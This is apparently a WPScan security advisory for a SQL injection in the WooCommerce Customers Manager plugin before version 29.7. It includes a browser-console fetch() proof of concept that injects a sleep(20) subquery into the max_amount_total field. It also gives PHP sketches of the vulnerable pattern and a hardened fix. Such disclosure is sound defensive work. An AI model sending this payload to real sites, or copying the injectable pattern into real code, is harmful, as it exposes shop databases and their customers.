wpvulndb | Ivan Spiridonov | WPVDB-ID: 1550E30C-BF80-48E0-BC51-67D29EBE7272 | History: Mar 25, 2024 - 12:00 a.m.

WooCommerce Customers Manager < 29.7 - Subscriber+ SQL Injection

2024-03-25 00:00:00
Ivan Spiridonov
wpscan.com

Tags: woocommerce, sql injection, subscriber+, security vulnerability

AI Score: 7.3 High (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.2%)

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by users with the Subscriber role or above. Note: v29.5 added an authorisation check, but the injection itself was not fixed and remained exploitable by users with the manage_woocommerce capability, such as Shop Manager and above.

PoC

Run the command below in the developer console of the web browser while on the blog as a subscriber user and note the 20s delayed response:

    fetch("/wp-admin/admin-ajax.php", {
        "headers": { "content-type": "application/x-www-form-urlencoded" },
        "method": "POST",
        "body": "action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount=0&min_amount_total=0&product_relationship=or&product_category_relationship=or&product_category_filters_relationship=and&statuses=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max_amount_total=(select*from(select(sleep(20)))a)",
        "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));
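The description makes two separate points: the parameter reaches the SQL text unescaped, and the authorisation added in v29.5 did not remove the injection. The following is an added illustration of both, written for this page and not taken from the plugin; the handler names (wccm_example_*), the nonce name, and the use of the WooCommerce HPOS wc_orders table with its total_amount and status columns are assumptions. The first function shows the vulnerable pattern (request values interpolated into the query), the second shows the hardened form, where the capability check alone would still leave Shop Managers able to inject, so the query itself is also made parameterised and the inputs are validated.

```php
<?php
// Added example, not the plugin's code. Handler names, nonce name and
// table/column names are assumptions made for illustration.

// BEFORE (vulnerable pattern): request values are pasted into the SQL text.
function wccm_example_count_orders_vulnerable() {
    global $wpdb;
    $min_total = $_POST['min_amount_total'];
    $max_total = $_POST['max_amount_total'];
    // Anything non-numeric in $max_total becomes part of the statement.
    $sql = "SELECT COUNT(*) FROM {$wpdb->prefix}wc_orders
            WHERE total_amount BETWEEN {$min_total} AND {$max_total}";
    wp_send_json( $wpdb->get_var( $sql ) );
}

// AFTER (hardened): authorisation AND a fixed query with bound values.
function wccm_example_count_orders_fixed() {
    global $wpdb;

    // Authorisation: restrict to users who may manage the shop. On its own
    // this does not fix the injection; it only narrows who can trigger it.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'wccm_example_nonce', 'nonce' );

    // Validation: amounts must be numeric, otherwise reject the request.
    foreach ( array( 'min_amount_total', 'max_amount_total' ) as $key ) {
        if ( ! isset( $_POST[ $key ] ) || ! is_numeric( wp_unslash( $_POST[ $key ] ) ) ) {
            wp_send_json_error( 'invalid ' . $key, 400 );
        }
    }
    $min_total = (float) wp_unslash( $_POST['min_amount_total'] );
    $max_total = (float) wp_unslash( $_POST['max_amount_total'] );

    // Status list: keep only values from a fixed allow-list of statuses.
    $allowed  = array(
        'wc-pending', 'wc-processing', 'wc-on-hold', 'wc-completed',
        'wc-cancelled', 'wc-refunded', 'wc-failed', 'wc-checkout-draft',
    );
    $raw      = sanitize_text_field( wp_unslash( $_POST['statuses'] ?? '' ) );
    $statuses = array_values( array_intersect( explode( ',', $raw ), $allowed ) );
    if ( empty( $statuses ) ) {
        wp_send_json_error( 'no valid status', 400 );
    }
    $placeholders = implode( ',', array_fill( 0, count( $statuses ), '%s' ) );

    // The query text is constant; every user-controlled value is bound.
    $sql = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}wc_orders
         WHERE total_amount BETWEEN %f AND %f AND status IN ($placeholders)",
        array_merge( array( $min_total, $max_total ), $statuses )
    );
    wp_send_json_success( (int) $wpdb->get_var( $sql ) );
}
add_action( 'wp_ajax_wccm_example_count_orders', 'wccm_example_count_orders_fixed' );
```

Two design points are worth noting. The IN list cannot be bound as a single placeholder, so the hardened version builds one %s per allow-listed status and passes the values as an array to $wpdb->prepare(). And because the vulnerable parameter in the advisory is a numeric filter, casting to float after an is_numeric() check removes the injection surface entirely, independent of any escaping.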

CPE Name    Operator    Version
            eq          29.7

